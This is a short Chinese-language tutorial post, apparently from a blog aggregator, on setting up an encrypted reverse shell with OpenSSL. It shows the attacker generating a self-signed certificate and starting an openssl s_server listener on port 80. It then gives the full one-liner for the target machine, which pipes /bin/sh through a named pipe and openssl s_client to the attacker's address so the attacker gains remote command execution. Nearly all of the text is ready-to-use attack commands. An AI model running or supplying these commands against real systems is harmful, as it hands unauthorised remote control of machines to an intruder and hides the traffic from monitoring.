使用OpenSSL的反弹shell

1、攻击机生成证书:

 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

使用OpenSSL的反弹shell_第1张图片

2、攻击机开启服务

openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行
使用OpenSSL的反弹shell_第2张图片

靶机交出控制权
使用OpenSSL的反弹shell_第3张图片

其他反弹shell命令

参见我的其他文章

你可能感兴趣的:(web安全,反弹shell,openssl,网络安全)